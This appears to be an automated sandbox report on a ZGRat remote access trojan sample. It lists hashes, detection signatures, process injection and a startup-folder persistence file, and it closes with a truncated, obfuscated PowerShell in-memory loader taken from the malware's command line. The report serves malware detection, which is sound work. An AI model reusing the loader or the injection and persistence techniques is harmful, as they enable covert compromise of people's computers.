zgrat | cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

Analysis

max time kernel
113s
max time network
98s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
15-05-2024 01:22

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

133fda00a490e613f3a6c511c1c660eb.exe
Size

4.5MB
MD5

133fda00a490e613f3a6c511c1c660eb
SHA1

e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9
SHA256

cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169
SHA512

f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd
SSDEEP

24576:ypPiRcjGOOiX3Sl9L7MupXdagdle6whTeo5A4T9W+xjaCsyfwUmvHX+ODvz8JQDm:

Score

10^/10

zgrat rat

Malware Config

Signatures

Detect ZGRat V1 34 IoCs

resource	yara_rule
behavioral2/memory/4052-2-0x0000000006590000-0x00000000067D0000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-6-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-22-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-20-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-34-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-37-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-52-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-50-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-48-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-46-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-38-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-30-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-28-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-44-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-42-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-41-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-32-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-26-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-25-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-62-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-67-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-58-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-56-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-54-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-68-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-65-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-60-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-12-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-10-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-8-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-18-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-16-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-14-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-5-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 944 created 1352	944	WerFault.exe	112
PID 1852 created 1352	1852	WerFault.exe	112

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

description	pid	Process	procid_target
PID 2728 created 616	2728	powershell.EXE	5
PID 1924 created 1352	1924	svchost.exe	112
PID 1924 created 1352	1924	svchost.exe	112

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs	133fda00a490e613f3a6c511c1c660eb.exe

Executes dropped EXE 2 IoCs

pid	Process
2204	$774c65ac
1352	$77d7e828

Drops file in System32 directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4052 set thread context of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	96
PID 2728 set thread context of 2336	2728	powershell.EXE	99
PID 4052 set thread context of 1352	4052	133fda00a490e613f3a6c511c1c660eb.exe	112

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
836	1352	WerFault.exe	112
2236	1352	WerFault.exe	112

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Modifies data under HKEY_USERS 52 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2728	powershell.EXE
2728	powershell.EXE
2728	powershell.EXE
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
4444	wlrmdr.exe
4444	wlrmdr.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
4052	133fda00a490e613f3a6c511c1c660eb.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
836	WerFault.exe
836	WerFault.exe
2336	dllhost.exe
2336	dllhost.exe
1924	svchost.exe
1924	svchost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2236	WerFault.exe
2236	WerFault.exe
2336	dllhost.exe
2336	dllhost.exe
1924	svchost.exe
1924	svchost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe

Suspicious behavior: LoadsDriver 64 IoCs

pid	Process
4736	Process not Found
4216	Process not Found
1052	Process not Found
844	Process not Found
4876	Process not Found
1012	Process not Found
1600	Process not Found
1492	Process not Found
4872	Process not Found
848	Process not Found
384	Process not Found
2832	Process not Found
2000	Process not Found
3892	Process not Found
3884	Process not Found
1468	Process not Found
3860	Process not Found
1680	Process not Found
3780	Process not Found
4244	Process not Found
1000	Process not Found
4688	Process not Found
2636	Process not Found
1224	Process not Found
4392	Process not Found
1432	Process not Found
4756	Process not Found
1316	Process not Found
4480	Process not Found
2728	Process not Found
1744	Process not Found
3844	Process not Found
4600	Process not Found
3824	Process not Found
3264	Process not Found
3300	Process not Found
2576	Process not Found
3268	Process not Found
668	Process not Found
2088	Process not Found
2600	Process not Found
732	Process not Found
2680	Process not Found
4048	Process not Found
3420	Process not Found
4724	Process not Found
4276	Process not Found
2704	Process not Found
3588	Process not Found
1572	Process not Found
4612	Process not Found
4596	Process not Found
888	Process not Found
1312	Process not Found
3408	Process not Found
4828	Process not Found
4816	Process not Found
5056	Process not Found
3684	Process not Found
2748	Process not Found
1168	Process not Found
664	Process not Found
4956	Process not Found
2964	Process not Found

Suspicious use of AdjustPrivilegeToken 28 IoCs

description	pid	Process
Token: SeDebugPrivilege	4052	133fda00a490e613f3a6c511c1c660eb.exe
Token: SeDebugPrivilege	2728	powershell.EXE
Token: SeDebugPrivilege	2728	powershell.EXE
Token: SeDebugPrivilege	2336	dllhost.exe
Token: SeAuditPrivilege	2580	svchost.exe
Token: SeShutdownPrivilege	3452	Explorer.EXE
Token: SeCreatePagefilePrivilege	3452	Explorer.EXE
Token: SeShutdownPrivilege	3452	Explorer.EXE
Token: SeCreatePagefilePrivilege	3452	Explorer.EXE
Token: SeShutdownPrivilege	3452	Explorer.EXE
Token: SeCreatePagefilePrivilege	3452	Explorer.EXE
Token: SeShutdownPrivilege	3452	Explorer.EXE
Token: SeCreatePagefilePrivilege	3452	Explorer.EXE
Token: SeRestorePrivilege	836	WerFault.exe
Token: SeBackupPrivilege	836	WerFault.exe
Token: SeBackupPrivilege	836	WerFault.exe
Token: SeShutdownPrivilege	3452	Explorer.EXE
Token: SeCreatePagefilePrivilege	3452	Explorer.EXE
Token: SeShutdownPrivilege	3452	Explorer.EXE
Token: SeCreatePagefilePrivilege	3452	Explorer.EXE
Token: SeShutdownPrivilege	2608	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	2608	mousocoreworker.exe
Token: SeShutdownPrivilege	2608	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	2608	mousocoreworker.exe
Token: SeShutdownPrivilege	2608	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	2608	mousocoreworker.exe
Token: SeShutdownPrivilege	2608	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	2608	mousocoreworker.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4444	wlrmdr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	96
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	96
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	96
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	96
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	96
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	96
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	96
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	96
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	96
PID 2728 wrote to memory of 2336	2728	powershell.EXE	99
PID 2728 wrote to memory of 2336	2728	powershell.EXE	99
PID 2728 wrote to memory of 2336	2728	powershell.EXE	99
PID 2728 wrote to memory of 2336	2728	powershell.EXE	99
PID 2728 wrote to memory of 2336	2728	powershell.EXE	99
PID 2728 wrote to memory of 2336	2728	powershell.EXE	99
PID 2728 wrote to memory of 2336	2728	powershell.EXE	99
PID 2728 wrote to memory of 2336	2728	powershell.EXE	99
PID 2336 wrote to memory of 616	2336	dllhost.exe	5
PID 2336 wrote to memory of 684	2336	dllhost.exe	7
PID 684 wrote to memory of 2628	684	lsass.exe	47
PID 2336 wrote to memory of 964	2336	dllhost.exe	12
PID 2336 wrote to memory of 60	2336	dllhost.exe	13
PID 684 wrote to memory of 2628	684	lsass.exe	47
PID 684 wrote to memory of 2628	684	lsass.exe	47
PID 684 wrote to memory of 2628	684	lsass.exe	47
PID 684 wrote to memory of 2628	684	lsass.exe	47
PID 2336 wrote to memory of 400	2336	dllhost.exe	14
PID 2336 wrote to memory of 904	2336	dllhost.exe	15
PID 2336 wrote to memory of 1036	2336	dllhost.exe	16
PID 2336 wrote to memory of 1080	2336	dllhost.exe	18
PID 2336 wrote to memory of 1112	2336	dllhost.exe	19
PID 2336 wrote to memory of 1128	2336	dllhost.exe	20
PID 2336 wrote to memory of 1268	2336	dllhost.exe	21
PID 2336 wrote to memory of 1300	2336	dllhost.exe	22
PID 2336 wrote to memory of 1324	2336	dllhost.exe	23
PID 2336 wrote to memory of 1460	2336	dllhost.exe	24
PID 2336 wrote to memory of 1480	2336	dllhost.exe	25
PID 616 wrote to memory of 4444	616	winlogon.exe	105
PID 616 wrote to memory of 4444	616	winlogon.exe	105
PID 2336 wrote to memory of 4444	2336	dllhost.exe	105
PID 2336 wrote to memory of 1496	2336	dllhost.exe	26
PID 2336 wrote to memory of 1540	2336	dllhost.exe	27
PID 2336 wrote to memory of 1612	2336	dllhost.exe	28
PID 2336 wrote to memory of 1652	2336	dllhost.exe	29
PID 2336 wrote to memory of 1660	2336	dllhost.exe	30
PID 2336 wrote to memory of 1748	2336	dllhost.exe	31
PID 2336 wrote to memory of 1764	2336	dllhost.exe	32
PID 2336 wrote to memory of 1876	2336	dllhost.exe	33
PID 2336 wrote to memory of 1884	2336	dllhost.exe	34
PID 2336 wrote to memory of 1908	2336	dllhost.exe	35
PID 2336 wrote to memory of 1940	2336	dllhost.exe	36
PID 2336 wrote to memory of 1376	2336	dllhost.exe	37
PID 2336 wrote to memory of 2100	2336	dllhost.exe	40
PID 2336 wrote to memory of 2164	2336	dllhost.exe	41
PID 2336 wrote to memory of 2348	2336	dllhost.exe	42
PID 2336 wrote to memory of 2388	2336	dllhost.exe	43
PID 2336 wrote to memory of 2400	2336	dllhost.exe	44
PID 2336 wrote to memory of 2532	2336	dllhost.exe	45
PID 2336 wrote to memory of 2580	2336	dllhost.exe	46
PID 2336 wrote to memory of 2628	2336	dllhost.exe	47
PID 1268 wrote to memory of 1148	1268	svchost.exe	106
PID 1268 wrote to memory of 1148	1268	svchost.exe	106
PID 2336 wrote to memory of 1148	2336	dllhost.exe	106
PID 2336 wrote to memory of 2660	2336	dllhost.exe	48

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:60
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0aaf3614-dbb1-43c9-9e5d-cd0b2b734deb}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2336
- C:\Windows\system32\wlrmdr.exe
  -s -1 -f 2 -t Your PC will automatically restart in one minute -m Windows ran into a problem and needs to restart. You should close this message now and save your work. -a 3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4444

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:400

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1036
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:axylMltnpBep{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CXiJXfVxnkdRml,[Parameter(Position=1)][Type]$VuxHBlLMlw)$DfakNndwyPK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+'e'+'c'+''+'t'+''+[Char](101)+''+'d'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+'ga'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+[Char](101)+''+'m'+'o'+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+'l'+'e'+'g'+'a'+''+[Char](116)+''+'e'+''+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'ut'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$DfakNndwyPK.DefineConstructor(''+'R'+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+'N'+'am'+[Char](101)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'P'+'u'+[Char](98)+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$CXiJXfVxnkdRml).SetImplementationFlags(''+[Char](82)+'un'+'t'+'im'+'e'+''+','+'M'+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');$DfakNndwyPK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+'V'+''+'i'+'rtu'+'a'+'l',$VuxHBlLMlw,$CXiJXfVxnkdRml).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+',M'+[Char](97)+''+[Char](110)+''+[Char](97)+'ge'+[Char](100)+'');Write-Output $DfakNndwyPK.CreateType();}$waskEbzTPtUNn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 